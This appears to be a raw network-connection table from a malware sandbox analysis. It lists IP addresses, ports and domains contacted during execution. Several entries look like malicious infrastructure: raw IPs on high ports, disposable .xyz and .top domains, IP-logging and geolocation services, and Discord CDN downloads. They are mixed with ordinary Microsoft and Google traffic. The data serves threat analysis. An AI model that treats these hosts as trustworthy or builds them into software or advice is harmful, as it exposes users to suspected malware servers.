| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 195.2.78.163:25450 | | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 45.14.49.128:5385 | | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 37.0.8.88:44263 | | tcp |
| N/A | 135.148.139.222:1494 | | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 95.181.172.100:55640 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 8.8.8.8:53 | ingstorage.com | udp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 8.8.8.8:53 | duzlwewk2uk96.cloudfront.net | udp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 8.8.8.8:53 | statuse.digitalcertvalidation.com | udp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.10:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.158.10:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 52.219.62.75:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.62.75:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 195.2.78.163:25450 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 135.148.139.222:1494 | | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 45.14.49.128:5385 | | tcp |
| N/A | 95.181.172.100:55640 | | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 72.21.91.29:80 | crl4.digicert.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 77.83.175.169:11490 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 135.181.123.52:12073 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 45.129.236.6:63318 | | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 195.58.37.175:80 | trecker33442aq.top | tcp |
| N/A | 195.58.37.175:80 | trecker33442aq.top | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 52.164.226.245:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 204.79.197.200:443 | | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 204.79.197.203:443 | | tcp |
| N/A | 2.22.22.210:443 | | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 199.91.155.129:443 | download2388.mediafire.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | | tcp |
| N/A | 131.253.33.200:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.54.64.202:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 131.253.33.203:443 | | tcp |
| N/A | 2.22.22.217:443 | | tcp |
| N/A | 52.142.114.2:443 | | tcp |
| N/A | 204.79.197.200:443 | | tcp |
| N/A | 13.32.240.21:443 | | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 185.180.231.69:42875 | 185.180.231.69 | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 192.243.59.12:443 | | tcp |
| N/A | 52.45.132.150:443 | | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 3.86.130.101:443 | | tcp |
| N/A | 3.86.130.101:443 | | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 104.22.65.104:443 | | tcp |
| N/A | 104.26.6.228:443 | | tcp |
| N/A | 104.26.7.228:443 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 91.142.79.35:61437 | | tcp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 188.34.200.103:80 | 188.34.200.103 | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 185.180.231.69:42875 | 185.180.231.69 | tcp |
| N/A | 204.79.197.203:443 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 98.126.1.130:434 | | tcp |
| N/A | 104.21.7.179:443 | mybrowserinfo.com | tcp |
| N/A | 91.142.79.35:61437 | | tcp |
| N/A | 52.182.141.63:443 | | tcp |
| N/A | 52.182.141.63:443 | | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 204.79.197.203:443 | | tcp |
| N/A | 13.32.240.76:443 | | tcp |
| N/A | 2.22.22.219:443 | | tcp |
| N/A | 52.142.114.2:443 | | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 127.0.0.1:5985 | | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 20.82.209.183:443 | | tcp |
| N/A | 20.82.209.183:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 23.43.75.27:80 | tl.symcd.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 204.79.197.203:443 | | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 23.73.0.144:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 192.243.59.12:443 | | tcp |
| N/A | 54.225.64.149:443 | | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 204.79.197.200:443 | | tcp |
| N/A | 2.22.22.219:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.217:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 139.45.197.236:80 | | tcp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.195.8:443 | | tcp |
| N/A | 139.45.197.240:443 | | tcp |
| N/A | 139.45.197.240:80 | | tcp |
| N/A | 138.68.244.123:443 | | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.100.48.86:443 | | tcp |
| N/A | 104.80.224.34:443 | | tcp |
| N/A | 104.80.224.121:443 | | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 34.240.223.28:443 | | tcp |
| N/A | 63.34.68.24:443 | | tcp |
| N/A | 104.80.224.233:443 | | tcp |
| N/A | 104.22.53.252:443 | | tcp |
| N/A | 15.188.95.229:443 | | tcp |
| N/A | 104.80.224.132:443 | | tcp |
| N/A | 104.80.228.121:443 | | tcp |
| N/A | 52.17.54.18:443 | | tcp |
| N/A | 52.39.53.231:443 | | tcp |
| N/A | 34.248.191.66:443 | | tcp |
| N/A | 35.222.211.90:443 | | tcp |
| N/A | 151.101.1.175:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 34.240.223.28:443 | | tcp |
| N/A | 52.17.54.18:443 | | tcp |
| N/A | 52.39.53.231:443 | | tcp |
| N/A | 142.251.36.8:443 | | udp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 35.186.249.72:443 | | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 3.8.61.137:443 | | tcp |
| N/A | 52.21.125.88:443 | norton.ow5a.net | tcp |
| N/A | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.21.125.88:443 | norton.ow5a.net | tcp |
| N/A | 35.222.211.90:443 | norton-app.quantummetric.com | tcp |
| N/A | 34.242.179.188:443 | ensighten.norton.com | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.219:443 | | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 23.73.0.135:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 185.92.73.172:80 | | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | | tcp |
| N/A | 5.252.194.220:443 | | tcp |
| N/A | 5.252.194.220:443 | | tcp |
| N/A | 104.21.89.239:443 | | tcp |
| N/A | 104.21.71.176:443 | | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 2.22.22.112:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 104.80.224.121:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 2.22.22.112:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.112:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 35.201.70.46:80 | www.directdexchange.com | tcp |
| N/A | 35.201.70.46:80 | | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 5.252.194.220:443 | | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
